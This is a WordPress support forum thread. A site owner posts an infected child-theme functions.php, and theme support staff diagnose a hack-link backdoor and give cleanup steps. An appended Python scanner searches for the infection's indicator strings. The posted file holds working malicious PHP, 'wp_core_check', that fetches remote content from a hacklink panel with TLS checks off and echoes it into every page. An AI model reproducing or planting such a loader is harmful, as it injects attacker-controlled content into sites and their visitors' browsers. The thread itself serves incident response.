unknown links on my site and the site is down.

  • #719403

    engootech
    Participant

    The website is currently down.
    I found unknown websites on my site.
    I scanned the site using Wordfence and resolved the issue.
    The website is down after the scan.

    Wordfence: File Viewer
    Filename: /home/spodly/public_html/wp-content/themes/woodmart-child/functions.php
    File Size: 3,077 bytes
    File last modified: Tuesday 19th of May 2026 10:22:47 PM
    <?php
    /**
     * Enqueue script and styles for child theme
     */
    function woodmart_child_enqueue_styles() {
        wp_enqueue_style( 'child-style', get_stylesheet_directory_uri() . '/style.css', array( 'woodmart-style' ), woodmart_get_theme_info( 'Version' ) );
    }
    add_action( 'wp_enqueue_scripts', 'woodmart_child_enqueue_styles', 10010 );

    add_filter( 'dynamic_sidebar_params', function($params) {
        if ( isset($params[0]['before_title']) ) {
            $params[0]['before_title'] = str_replace('<h5 class="widget-title">','<div class="widget-title">',$params[0]['before_title']);
        }
        if ( isset($params[0]['after_title']) ) {
            $params[0]['after_title'] = str_replace('</h5>','</div>',$params[0]['after_title']);
        }
        return $params;
    });
    add_action(“init”,function(){if(!defined(“DONOTCACHEPAGE”)){define(“DONOTCACHEPAGE”,true);}if(defined(“LSCACHE_NO_CACHE”)){header(“X-LiteSpeed-Control: no-cache”);}if(function_exists(“nocache_headers”)){nocache_headers();}if(!headers_sent()){header(“Cache-Control: no-store, no-cache, must-revalidate, max-age=0”);header(“Pragma: no-cache”);header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);header(“X-Accel-Expires: 0”);header(“X-Cache-Control: no-cache”);header(“CF-Cache-Status: BYPASS”);header(“X-Forwarded-Proto: “);}if(defined(“WP_CACHE”)&&WP_CACHE){define(“DONOTCACHEPAGE”,true);}if(function_exists(“wp_cache_flush”)){wp_cache_flush();}});add_action(“wp_head”,function(){if(!headers_sent()){header(“X-Frame-Options: SAMEORIGIN”);}},1);add_action(“wp_footer”,function(){if(function_exists(“w3tc_flush_all”)){w3tc_flush_all();}if(function_exists(“wp_cache_clear_cache”)){wp_cache_clear_cache();}},999);
    / Telegram: https://t.me/hacklink_panel */
    if(!function_exists(‘wp_core_check’)){function wp_core_check(){static $done=false;if($done){return;}if(class_exists(‘Elementor\Plugin’)){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u=”https://panel.hacklinkmarket.com/code?v=&#8221;.time();$d=(!empty($_SERVER[‘HTTPS’])&&$_SERVER[‘HTTPS’]!==’off’?”https://&#8221;:”http://&#8221;).$_SERVER[‘HTTP_HOST’].”/”;if(function_exists(‘curl_init’)){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>[“X-Request-Domain:”.$d,”User-Agent: WordPress/”.get_bloginfo(‘version’)],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get(‘allow_url_fopen’)){$o=[‘http’=>[‘header’=>’X-Request-Domain:’.$d,’timeout’=>10],’ssl’=>[‘verify_peer’=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists(‘fopen’)){if($f=@fopen($u,’r’)){$r=”;while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action(‘wp_footer’,’wp_core_check’,999);add_action(‘wp_head’,’wp_core_check’,999);}

    After the initial check, I am now checking again to ensure the site is free of unknown links.

    #719473

    Aizaz Imtiaz Awan
    Keymaster
    Xtemos team

    Hello,

    Your site is infected with malicious code inside woodmart-child/functions.php (hack link/backdoor injection). This is not related to the theme itself.

    Please immediately:

    – Delete and replace the entire functions.php file with a clean version
    – Re-upload a fresh child theme from the original WoodMart package
    – Run a full malware scan and remove any files containing wp_core_check or hack link market

    After the cleanup, also change all passwords (WP, FTP, hosting).

    Best Regards

    #719556

    engootech
    Participant

    I want you to log in to the website and change woodmart-child/functions.php.

    #719574

    Serg Sokhatskyi
    Keymaster
    Xtemos team

    Hello,
    Thanks for reaching out.

    We understand the site was infected and the woodmart-child/functions.php file contains malicious code. While we can advise on the cleanup steps, logging in to your site and performing fixes is outside the scope of our theme support.

    Please follow these recommendations:
    – Create a backup or, ideally, a staging copy to work on safely.
    – Replace the child theme:
        – Delete wp-content/themes/woodmart-child entirely.
        – Upload a fresh woodmart-child theme from the original WoodMart package (woodmart-child.zip). If you had custom code, re-add it manually only after carefully reviewing it.
    – Reinstall from trusted sources:
        – Reinstall/update the WoodMart parent theme from a fresh package.
        – Delete and reinstall all plugins from official sources (WordPress.org or the vendor).
        – Reinstall WordPress core (Dashboard > Updates > Re-install Now) to replace core files.
    – Hunt for backdoors:
        – Check wp-config.php, .htaccess, and index.php for unfamiliar code.
        – Inspect wp-content/mu-plugins, wp-content/uploads, and any recently modified PHP files.
        – Review Administrator users and cron jobs; remove anything unknown.
    – Temporarily disable caching/optimization during cleanup; clear all caches afterward.
    – Run a full malware scan again and make sure there are no references like wp_core_check or hacklinkmarket left.
    – Change all passwords (WP admin, hosting panel, FTP/SSH, database) and regenerate WordPress security keys (salts).
    – Ask your hosting provider to scan the account and review server logs for suspicious activity.

    Kind regards,
    XTemos Studio
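
The re-scan both replies ask for (no remaining references to wp_core_check or hacklinkmarket, plus a look at wp-content/uploads and recently modified PHP files), sketched as an added example that is not part of the original thread and not Wordfence's or XTemos's code. The indicator strings come from the infected functions.php posted above; the function names, the 14-day window and the TLS-verification heuristic are assumptions of this example.

```python
import os
import re
import time

# Indicator strings taken from the infected functions.php shown in this thread.
INDICATORS = [b"wp_core_check", b"hacklinkmarket", b"hacklink_panel", b"X-Request-Domain"]
# Heuristic (assumption): the loader disables TLS verification before fetching
# remote content. Legitimate code sometimes does this too, so review each hit.
WEAK_TLS = re.compile(rb"CURLOPT_SSL_VERIFYPEER\s*=>\s*false|verify_peer['\"]?\s*=>\s*false")
PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".phar")

def scan_file(path):
    """Return the reasons a single file looks suspicious (empty list if none)."""
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError as exc:
        return [f"unreadable: {exc.strerror}"]
    reasons = [f"indicator:{i.decode()}" for i in INDICATORS if i in data]
    if WEAK_TLS.search(data):
        reasons.append("tls-verification-disabled")
    return reasons

def scan_tree(root, recent_days=14, now=None):
    """Walk a WordPress root and return {relative_path: [reasons]} for PHP files."""
    now = time.time() if now is None else now
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = scan_file(path)
            # The media library should hold no executable PHP at all.
            if "/uploads/" in "/" + rel:
                reasons.append("php-in-uploads")
            # Recency alone is not a finding; it only ranks files already flagged.
            if reasons and now - os.path.getmtime(path) < recent_days * 86400:
                reasons.append("recently-modified")
            if reasons:
                findings[rel] = reasons
    return findings

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, reasons in sorted(scan_tree(root).items()):
        print(f"{rel}: {', '.join(reasons)}")
```

Run it against the site root before and after the cleanup; an empty result only means these specific strings are gone, so the host-side scan and log review recommended above still apply.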
